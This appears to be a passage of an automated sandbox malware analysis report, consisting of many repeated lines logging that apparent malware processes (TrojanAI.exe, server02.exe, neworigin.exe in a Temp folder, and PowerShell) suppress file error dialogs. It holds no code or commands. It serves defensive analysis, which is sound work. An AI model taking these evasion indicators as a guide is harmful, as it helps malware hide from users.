                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
